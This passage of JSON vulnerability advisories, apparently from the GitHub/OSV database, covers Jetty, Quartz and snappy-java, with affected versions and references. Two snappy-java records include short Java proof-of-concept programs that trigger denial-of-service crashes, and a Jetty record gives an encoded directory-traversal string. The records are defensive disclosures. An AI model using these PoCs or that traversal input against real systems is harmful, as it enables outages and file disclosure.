"6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.10", "6.1.11", "6.1.12", "6.1.12.rc2", "6.1.12.rc3", "6.1.12.rc4", "6.1.12.rc5", "6.1.12rc1", "6.1.14", "6.1.15", "6.1.15.pre0", "6.1.15.rc2", "6.1.15.rc3", "6.1.15.rc4", "6.1.15.rc5", "6.1.16", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6", "6.1.6rc0", "6.1.6rc1", "6.1.7", "6.1.8", "6.1.9", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9986-w5h5-vw59/GHSA-9986-w5h5-vw59.json" } }, { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0.M0" }, { "fixed": "7.0.0.M2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9986-w5h5-vw59/GHSA-9986-w5h5-vw59.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1523" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=499867" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01257.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01259.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01262.html" }, { "type": "WEB", "url": "http://itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02282388" }, { "type": "WEB", "url": "http://jira.codehaus.org/browse/JETTY-1004" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/402580" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/CRDY-7RKQCY" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/34800" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/35675" }, { "type": "WEB", "url": "http://www.securitytracker.com/id?1022563" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2009/1900" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2010/1792" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-08-03T17:32:50Z", "nvd_published_at": "2009-05-05T17:30:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cwq3-qp8v-w8q3", "published": "2022-05-01T02:20:38Z", "modified": "2024-11-28T05:34:11.091547Z", "aliases": [ "CVE-2005-3747" ], "summary": "Mortbay Jetty Discloses JSP Source Code", "details": "Unspecified vulnerability in Jetty before 5.1.6 allows remote attackers to obtain source code of JSP pages, possibly involving requests for .jsp files with URL-encoded backslash (`%5C`) characters. NOTE: this might be the same issue as CVE-2006-2758.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.1.6" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-cwq3-qp8v-w8q3/GHSA-cwq3-qp8v-w8q3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3747" }, { "type": "WEB", "url": "http://sourceforge.net/project/shownotes.php?release_id=372086\u0026group_id=7322" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/450315/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/15515" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2023-09-18T23:46:51Z", "nvd_published_at": "2005-11-22T11:03:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-fvh3-4v5r-cvvc", "published": "2022-05-01T18:35:01Z", "modified": "2023-11-08T03:56:48.986632Z", "aliases": [ "CVE-2007-5614" ], "summary": "Improper Authentication in Mortbay Jetty", "details": "Mortbay Jetty before 6.1.6rc1 does not properly handle \"certain quote sequences\" in HTML cookie parameters, which allows remote attackers to hijack browser sessions via unspecified vectors.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.6" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6rc0", "6.1.6rc1", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fvh3-4v5r-cvvc/GHSA-fvh3-4v5r-cvvc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5614" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://www.eclipse.org/jetty/about.php" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00227.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00250.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/438616" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-06-08T22:32:50Z", "nvd_published_at": "2007-12-05T11:46:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mq4x-8whh-jx73", "published": "2022-05-01T07:02:10Z", "modified": "2023-11-08T03:56:46.786542Z", "aliases": [ "CVE-2006-2759" ], "summary": "Improper Input Validation in Mortbay Jetty ", "details": "jetty 6.0.x (jetty6) beta16 allows remote attackers to read arbitrary script source code via a capital P in the .jsp extension, and probably other mixed case manipulations.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.0.0" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-mq4x-8whh-jx73/GHSA-mq4x-8whh-jx73.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-2759" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://www.eclipse.org/jetty/about.php" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-08T22:32:53Z", "nvd_published_at": "2006-06-02T01:02:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p5rr-q5g6-gm42", "published": "2022-04-29T03:01:19Z", "modified": "2024-11-28T05:30:07.803612Z", "aliases": [ "CVE-2004-2381" ], "summary": "Jetty HTTP Server Denial of Service vulnerability", "details": "HttpRequest.java in Jetty HTTP Server before 4.2.19 allows remote attackers to cause denial of service (memory usage and application crash) via HTTP requests with a large Content-Length.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.19" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-p5rr-q5g6-gm42/GHSA-p5rr-q5g6-gm42.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2004-2381" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/15537" }, { "type": "WEB", "url": "http://cvs.sourceforge.net/viewcvs.py/jetty/Jetty/src/org/mortbay/http/HttpRequest.java?r1=1.75\u0026r2=1.76" }, { "type": "WEB", "url": "http://sourceforge.net/project/shownotes.php?release_id=224743" }, { "type": "WEB", "url": "http://www.osvdb.org/4387" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-09-18T22:57:43Z", "nvd_published_at": "2004-12-31T05:00:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-qmgj-5h75-jr67", "published": "2022-05-01T07:02:10Z", "modified": "2024-11-28T05:30:12.510709Z", "aliases": [ "CVE-2006-2758" ], "summary": "Jetty Directory Traversal Vulnerability", "details": "Directory traversal vulnerability in jetty 6.0.x (jetty6) beta16 allows remote attackers to read arbitrary files via a `%2e%2e%5c` (encoded `../`) in the URL. NOTE: this might be the same issue as CVE-2005-3747.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "6.0.beta16" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-qmgj-5h75-jr67/GHSA-qmgj-5h75-jr67.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-2758" }, { "type": "PACKAGE", "url": "https://github.com/jetty-project/codehaus-jetty6" }, { "type": "WEB", "url": "https://web.archive.org/web/20200302050157/http://securitytracker.com/id?1016168" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2024-02-12T16:10:17Z", "nvd_published_at": "2006-06-02T01:02:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-9qcf-c26r-x5rf", "published": "2020-07-01T17:55:03Z", "modified": "2024-10-15T23:39:47.179091Z", "aliases": [ "CVE-2019-13990" ], "summary": "XML external entity injection in Terracotta Quartz Scheduler", "details": "initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.", "affected": [ { "package": { "name": "org.quartz-scheduler:quartz", "ecosystem": "Maven", "purl": "pkg:maven/org.quartz-scheduler/quartz" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.3.2" } ] } ], "versions": [ "1.7.2", "1.7.3", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "2.0.0", "2.0.1", "2.0.2", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.6", "2.1.7", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.3.0", "2.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-9qcf-c26r-x5rf/GHSA-9qcf-c26r-x5rf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13990" }, { "type": "WEB", "url": "https://github.com/quartz-scheduler/quartz/issues/467" }, { "type": "WEB", "url": "https://github.com/quartz-scheduler/quartz/pull/501" }, { "type": "WEB", "url": "https://github.com/quartz-scheduler/quartz/commit/13c1d45aa1db15d0fa0e4997139c99ba219be551" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0002" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGQUARTZSCHEDULER-461170" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82%40%3Cdev.tomee.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/quartz-scheduler/quartz" }, { "type": "WEB", "url": "https://confluence.atlassian.com/security/ssot-117-cve-2019-13990-xxe-xml-external-entity-injection-vulnerability-in-jira-service-management-data-center-and-jira-service-management-server-1295385959.html" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-07-01T17:54:54Z", "nvd_published_at": "2019-07-26T19:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-55g7-9cwv-5qfv", "published": "2023-09-25T18:30:18Z", "modified": "2024-02-16T08:07:08.591827Z", "aliases": [ "CVE-2023-43642" ], "related": [ "CGA-82h8-5945-hf9h", "CGA-hp96-wjrq-9f66", "CVE-2023-43642" ], "summary": "snappy-java's missing upper bound check on chunk length can lead to Denial of Service (DoS) impact", "details": "### Summary\n\nsnappy-java is a data compression library in Java. Its SnappyInputStream was found to be vulnerable to Denial of Service (DoS) attacks when decompressing data with a too-large chunk size. Due to missing upper bound check on chunk length, an unrecoverable fatal error can occur. \n\n### Scope\n\nAll versions of snappy-java including the latest released version 1.1.10.3. A fix is applied in 1.1.10.4\n\n### Details\nWhile performing mitigation efforts related to [CVE-2023-34455](https://nvd.nist.gov/vuln/detail/CVE-2023-34455) in Confluent products, our Application Security team closely analyzed the fix that was accepted and merged into snappy-java version 1.1.10.1 in [this](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea) commit. The check on [line 421](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR421) only attempts to check if chunkSize is not a negative value. We believe that this is an inadequate fix as it misses an upper-bounds check for overly positive values such as 0x7FFFFFFF (or (2,147,483,647 in decimal) before actually [attempting to allocate](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR429) the provided unverified number of bytes via the “chunkSize” variable. This missing upper-bounds check can lead to the applications depending upon snappy-java to allocate an inappropriate number of bytes on the heap which can then cause an java.lang.OutOfMemoryError exception. Under some specific conditions and contexts, this can lead to a Denial-of-Service (DoS) attack with a direct impact on the availability of the dependent implementations based on the usage of the snappy-java library for compression/decompression needs.\n\n### PoC\nCompile and run the following code:\n```\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n byte[] out = new byte[50];\n try {\n in.read(out);\n }\n catch (Exception ignored) {\n }\n }\n}\n```\n\n### Impact\nDenial of Service of applications dependent on snappy-java especially if `ExitOnOutOfMemoryError` or `CrashOnOutOfMemoryError` is configured on the JVM.\n\n### Credits\nJan Werner, Mukul Khullar and Bharadwaj Machiraju from Confluent's Application Security team. \n\nWe kindly request for a new CVE ID to be assigned once you acknowledge this vulnerability.", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.4" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.10.1", "1.1.10.2", "1.1.10.3", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-55g7-9cwv-5qfv/GHSA-55g7-9cwv-5qfv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-55g7-9cwv-5qfv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43642" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/9f8c3cf74223ed0a8a834134be9c917b9f10ceb5" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/releases/tag/v1.1.10.4" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-09-25T18:30:18Z", "nvd_published_at": "2023-09-25T20:15:11Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fjpj-2g6w-x25r", "published": "2023-06-15T16:28:08Z", "modified": "2024-02-16T08:21:07.894811Z", "aliases": [ "CVE-2023-34454" ], "related": [ "CGA-4248-v6xc-823x" ], "summary": "snappy-java's Integer Overflow vulnerability in compress leads to DoS", "details": "## Summary\nDue to unchecked multiplications, an integer overflow may occur, causing an unrecoverable fatal error.\n## Impact\nDenial of Service\n## Description\nThe function [compress(char[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L169) in the file [Snappy.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/Snappy.java) receives an array of characters and compresses it. It does so by multiplying the length by 2 and passing it to the [rawCompress](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L422) function.\n\n```java\npublic static byte[] compress(char[] input)\n throws IOException\n {\n return rawCompress(input, input.length * 2); // char uses 2 bytes\n }\n\n```\n\nSince the length is not tested, the multiplication by two can cause an integer overflow and become negative. The rawCompress function then uses the received length and passes it to the natively compiled maxCompressedLength function, using the returned value to allocate a byte array.\n\n```java\n public static byte[] rawCompress(Object data, int byteSize)\n throws IOException\n {\n byte[] buf = new byte[Snappy.maxCompressedLength(byteSize)];\n int compressedByteSize = impl.rawCompress(data, 0, byteSize, buf, 0);\n byte[] result = new byte[compressedByteSize];\n System.arraycopy(buf, 0, result, 0, compressedByteSize);\n return result;\n }\n\n```\n\nSince the maxCompressedLength function treats the length as an unsigned integer, it doesn’t care that it is negative, and it returns a valid value, which is casted to a signed integer by the Java engine. If the result is negative, a “java.lang.NegativeArraySizeException” exception will be raised while trying to allocate the array “buf”. On the other side, if the result is positive, the “buf” array will successfully be allocated, but its size might be too small to use for the compression, causing a fatal Access Violation error.\nThe same issue exists also when using the “compress” functions that receive double, float, int, long and short, each using a different multiplier that may cause the same issue. The issue most likely won’t occur when using a byte array, since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place.\n\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.Snappy;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n char[] uncompressed = new char[0x40000000];\n byte[] compressed = Snappy.compress(uncompressed);\n }\n}\n\n```\n\nThe program will crash, creating crashdumps and showing the following error (or similar):\n\n```\n#\n# A fatal error has been detected by the Java Runtime Environment:\n#\n# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x0000000063a01c20, pid=21164, tid=508\n#\n.......\n```\n\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.Snappy;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n char[] uncompressed = new char[0x3fffffff];\n byte[] compressed = Snappy.compress(uncompressed);\n }\n}\n```\n\nThe program will crash with the following error (or similar), since the maxCompressedLength returns a value that is interpreted as negative by java:\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -1789569677\n\tat org.xerial.snappy.Snappy.rawCompress(Snappy.java:425)\n\tat org.xerial.snappy.Snappy.compress(Snappy.java:172)\n\tat org.example.Main.main(Main.java:10)\n\n```", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.1" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", 